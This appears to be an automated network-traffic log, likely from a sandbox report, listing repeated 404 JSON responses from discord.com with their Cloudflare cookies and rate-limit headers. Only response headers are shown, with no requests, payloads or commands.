Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:02 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=35a295427cec11ef91f2bee3f8a49ee5; Expires=Wed, 26-Sep-2029 16:19:02 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453943x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xRWE2%2FbkJRY5CBVvGAMXY%2FfawRRtG%2B174oxnlApwpmKo6LvcPf95SgqnIYPVEYpGFzc6Z4p6hePoiEefq3q09GrVs4NdN0OEnXqTNxpRfM8orrA0tbuT62MRMYBv"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=35a295427cec11ef91f2bee3f8a49ee5d8d0e84959a2381178676574c1aca333daa355925bb8caffbdcc127a490ba9d7; Expires=Wed, 26-Sep-2029 16:19:02 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=c706bff95cf2f6ea15d8fa6873914924c3ad57a1-1727453942; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:04 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=36d953d87cec11efb2b57e7726d028ec; Expires=Wed, 26-Sep-2029 16:19:04 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453946x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x%2BLVaQmZS2Sc3Ef9Brfygf%2FLqkF6%2Fvon5MjZ65z4vlAicTKRzU6zDJ3HPkmqt0IG%2B3VVqG6xQ%2BjBu7AKHb8I3laRIWQ9LrPECDeecIKtvuWl3nE4B1mFOTcajhLQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=36d953d87cec11efb2b57e7726d028ecf197d44e174edb94b72f5026d3879ad6f2483b00dc1582840d93ff3c0e1a2a6c; Expires=Wed, 26-Sep-2029 16:19:04 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=eec4d8ba3fc34a38b5d32968d39e8cb613742df2-1727453944; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:05 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=3745d8fa7cec11efbb26cece28a49ce1; Expires=Wed, 26-Sep-2029 16:19:05 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453946x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q0GzNcUAQ5QXOYzMaOpozO4%2BjxJxGJGKIdU993iowjdeHkBreq2DYvaZvOwtEOXX%2FvNladSKdp9TQTQNSGxMqQuwKdKEI3nH1ZA6A4dBnu7TKVUcvR4TWgmWjsV%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=3745d8fa7cec11efbb26cece28a49ce13daca396a1a4a9e12bcb6eeac38f019c9784077103db5b2217588a1ef5ba7d7d; Expires=Wed, 26-Sep-2029 16:19:05 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=7baeebdb1a22e590ef420eaf6d22938737c07a8d-1727453945; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:05 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=374743ac7cec11efad60cece28a49ce1; Expires=Wed, 26-Sep-2029 16:19:05 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 3x-ratelimit-reset: 1727453947x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FAPX00iiQL2rdPnCQWLuW6iaItu3J7BL86ppxuslPnr%2B4oFrLgyLmEUsd6U97Dt7l1l4eDhFjjBxSy5Wf96AqxS1hGIjlQFmnMBumy%2BI43B2QF%2BS7g2YCxCsJjvz"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=374743ac7cec11efad60cece28a49ce116494306dec66456f12201b532cb9c28525ab117b160869c96c8222438cb39be; Expires=Wed, 26-Sep-2029 16:19:05 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=7baeebdb1a22e590ef420eaf6d22938737c07a8d-1727453945; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:06 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=37aeaeb67cec11ef85eda6d8f199100f; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 3x-ratelimit-reset: 1727453947x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KM4BQVU0LGejaUHXf1y3BqoHku%2BjDuqeQVXkWTBIfnTsUWC5NH2ZIf354Pdni3mz7bfks51DO%2F%2BoY5Hl348PyPRudfcQ%2Be58hKtyTFrk80aXU2QuvQMhgKwcJm%2B7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=37aeaeb67cec11ef85eda6d8f199100f6db23391f423498162d6ca09eef0d3fa3b8684ee6f6c835feaaad9d48724a5b9; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=775dfac769927facd0539e6a10014028daddaa4a-1727453946; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:06 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=37aff3e87cec11efbb52ae4c9400efeb; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 2x-ratelimit-reset: 1727453947x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9qMQEAOm6NrlxMh8s5UO%2F%2BHEiFd9jjLNvRT7o6EEr7zlXwjBoVwfX1RzuhBGYqASBddXH8Ev2mezdRqvfmO2DsKUNUlSPrAv99SbtoHzfbc9J96PEV14RAe1z3zC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=37aff3e87cec11efbb52ae4c9400efebca9b0b1ab47e7d0f658e805fca08bf61eebe35b75bba37ff949679cb1f0dcdba; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=775dfac769927facd0539e6a10014028daddaa4a-1727453946; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:06 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=381339c67cec11efbb26cece28a49ce1; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 3x-ratelimit-reset: 1727453948x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bil0c3CqXVvvD3zwBq227AuCXJ3tJeoBU0%2BHWNRRSZLHasVn8Ad5p5m3AkkUnFib2hv%2BhS2wH80N8jALQm4SdDrYhkbc0umG8QJ1PufWFMqy0zybpgcuTfF%2F%2BUl4"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=381339c67cec11efbb26cece28a49ce1f7bd41e7dceb3c44c257ff999305afb072279e843d1fc80df6472b02d4fd096e; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=775dfac769927facd0539e6a10014028daddaa4a-1727453946; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:06 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=381340887cec11efafbcae4c9400efeb; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 2x-ratelimit-reset: 1727453948x-ratelimit-reset-after: 2via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=McIE3SqgLdgOPtBYrzWiGaix1jCSs7wySKaGD%2FERFbfj2jXNs9fbNTYHjosy5%2FRtcvfHEiDlGvpIAtkJ9IFTmCI4b1Z%2BLin3kwNxa83YpVNZSl%2Fhjv48RnuF2Ds6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=381340887cec11efafbcae4c9400efeb1db3f564adc72d3a8d8b446b99df56db4010188797c4edf082d1b3b232b9355b; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=775dfac769927facd0539e6a10014028daddaa4a-1727453946; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:06 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=383335be7cec11efa46d469f692a6ab3; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 1x-ratelimit-reset: 1727453949x-ratelimit-reset-after: 2via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WUsp5IVLl%2Bb6bd5%2BDCRNSiDfH7B8zZjIaYqLDDMGTmJ6pmgOsR00vjq30RzdmORPSdFjd58le4q2A%2BoLaag%2F9NQyNs2ryU6CVc%2BzEmSnVMv7zWaZOOQbsclW7Sww"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=383335be7cec11efa46d469f692a6ab3d563670ae8fa136aed5ba07caf916322885a75166b27f336f2d6c006180c359c; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=775dfac769927facd0539e6a10014028daddaa4a-1727453946; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:07 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=387716e47cec11efa24492cc3f667719; Expires=Wed, 26-Sep-2029 16:19:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 2x-ratelimit-reset: 1727453949x-ratelimit-reset-after: 2via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o2Sqp9Egez%2F%2Fo5xYNm9bkyplS2mGoLogezTeOyzXaqqYr6B1AotK9LqCILgFyM6Eb5U2Mf1xqeF3iOG2rZtcxE%2BsH3O3I8g7TuEQV%2FevMyIJerg1vpr4xTTehySH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=387716e47cec11efa24492cc3f66771902cb7f58775a7929388c906eed3f87ea1e1c590be7e2057e04de1d46fa5ef857; Expires=Wed, 26-Sep-2029 16:19:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=c0a44cf1d4ebb578a3030e3a2bd1124066d8920e-1727453947; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:07 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=387de5787cec11efa7fd768b656d6a57; Expires=Wed, 26-Sep-2029 16:19:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 1x-ratelimit-reset: 1727453949x-ratelimit-reset-after: 2via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OAyEF1TnZYJlf10iIEZWrrEkISAatWyy0AtnYkkoLN%2FK0eAGpQug%2Buvz3hDMBb1ODtwRKF1bpauqz40RVT2maZLwCL4CRYbyEqFznQfIH9j3YuS3D1azwPp7Fme3"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=387de5787cec11efa7fd768b656d6a576e74e38d9f01eabb85bb086eb923249a6a8921914e2be0f9f75ca31e9d4dfefb; Expires=Wed, 26-Sep-2029 16:19:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=c0a44cf1d4ebb578a3030e3a2bd1124066d8920e-1727453947; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:07 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=38981fec7cec11ef80f2469f692a6ab3; Expires=Wed, 26-Sep-2029 16:19:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 0x-ratelimit-reset: 1727453950x-ratelimit-reset-after: 2via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u4Bek5%2Beth%2FT5N%2F3HReY%2F6GOrUEcz2Iq44Nal6RNGuRKOkV8PP96g7a56e3x3b2njvyI0aPbOXV5XiIc0Vu9UL1JdRtUWc42MJnW5raPso6oWyryoA3RRE%2BaxnYf"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=38981fec7cec11ef80f2469f692a6ab36bd029b63b86c8f13de41a76ac6bc55389476b40226a3f1d3a3fa2524e5821f8; Expires=Wed, 26-Sep-2029 16:19:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=c0a44cf1d4ebb578a3030e3a2bd1124066d8920e-1727453947; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:08 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=38e3c7307cec11ef97003ec234dfa563; Expires=Wed, 26-Sep-2029 16:19:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 0x-ratelimit-reset: 1727453950x-ratelimit-reset-after: 2via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kCoHAj4r8G6KMIRg74eJaM76feI23vzOfSCCh713JKhj4L3QmWiAkjmFUnAGcHkHjPFGmIWZiECX131fDyykiCv38YUxLC2GBN7QTFGPV%2Bf%2BJ2pSzkf4NTXJ1pj2"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=38e3c7307cec11ef97003ec234dfa5632e6efa5728204c9d829a6caae7b0647161891c01be7d76d605dac8b76e61473f; Expires=Wed, 26-Sep-2029 16:19:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=e61c2e80841d69c8d2221fd32020837f94fe0ef7-1727453948; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:08 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=38fb081e7cec11efa015ce5421a2957b; Expires=Wed, 26-Sep-2029 16:19:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 0x-ratelimit-reset: 1727453951x-ratelimit-reset-after: 2via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i8qi0QFieyFHr5IzCu7iUGCIMOcleG7k7VWtvX8gM2MWG%2ByJ3KUPvgpsxbCYKMu2yMm7yXI7jR2jA8nECf5LQtaNfoFngVO552bbszKoLCgYRgOMRG1MgjxY7lP5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=38fb081e7cec11efa015ce5421a2957b0482c3917c8f9110c39af5c875593f193ecc1f3171e117b55844e2ef89dcc1f1; Expires=Wed, 26-Sep-2029 16:19:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=e61c2e80841d69c8d2221fd32020837f94fe0ef7-1727453948; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:08 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=394a31c87cec11ef80916ec6ea4fc16e; Expires=Wed, 26-Sep-2029 16:19:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 0x-ratelimit-reset: 1727453951x-ratelimit-reset-after: 2via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pGEykrVebyMU%2FTzJ10ycn7GWwQAUrymWlSKk%2F70JA%2FlePm5eoVmZU1HHLwgsCm6rrJHYDh3355GH6XcZdT810MgSfr0yw2ZG5I4SaCJxvDNvEsQrKEYPETcTCHiI"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=394a31c87cec11ef80916ec6ea4fc16eeb68a171fda8c701c44612801a047c2ff379b8173eabdaf48ef4e3bcc99742c0; Expires=Wed, 26-Sep-2029 16:19:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=e61c2e80841d69c8d2221fd32020837f94fe0ef7-1727453948; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:09 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=39acd5087cec11efb895f699fc4aef6a; Expires=Wed, 26-Sep-2029 16:19:09 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 1x-ratelimit-reset: 1727453951x-ratelimit-reset-after: 2via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UYBtQdG4kfaJH1oGxcUbBE98sAkGM44PGnAfmSSdjCWbOQpwQDDP36%2BWTN5d29noNaqY93Mr9wiNUPpp3AOZAn665h%2B5iwEMOrAsK4SawZSIJURDTB%2FrXi8mF%2FQ1"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=39acd5087cec11efb895f699fc4aef6a82a9b4750cdf7018f34d51969ca16372a8e4b35b98421de338c03f3e6a99687a; Expires=Wed, 26-Sep-2029 16:19:09 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=4eac34489b61163802acf4eaff01ca33388837f5-1727453949; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:09 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=39b2fb687cec11efabf4124b36f1d382; Expires=Wed, 26-Sep-2029 16:19:09 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 0x-ratelimit-reset: 1727453952x-ratelimit-reset-after: 2via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LP2pxsaji1yu2xtmtTGdkDca6HJpJxjNMtqTAPHoxg9pY4V0MKCyKVGCLDgDRYlOdmmpVM0nJCr1XdZpDZYi2C93hmMJ8TPA7BFHyi6uGefr%2FSjxTplqq%2FT4qyJ2"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=39b2fb687cec11efabf4124b36f1d382f2fee3e68b0b4e5fe8b64e54d41f7df1e72556bb6b42e6797270bd2db57f4579; Expires=Wed, 26-Sep-2029 16:19:09 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=4eac34489b61163802acf4eaff01ca33388837f5-1727453949; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:10 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=3a164cd67cec11ef849f62361d7ce716; Expires=Wed, 26-Sep-2029 16:19:10 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 0x-ratelimit-reset: 1727453952x-ratelimit-reset-after: 2via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KXNDsMqm7ttp6WcPQ2B4Cq46UaSzT1mWwd%2FCX31hK7PYADbf2F4%2BweKuR9%2FYuHmELLnpSVyZ7nEKgGaRkBX%2FdTQtR6i%2BOFsvBmgHMhbaInYVsj%2BOOaXfdhwxZGk6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=3a164cd67cec11ef849f62361d7ce7165874f6569c4d66a6206797eb89e1609cd010cdd05def258c2f3b2a794122a928; Expires=Wed, 26-Sep-2029 16:19:10 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=ae131b04a6811b8fe62774872c5a2e51e774318a-1727453950; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
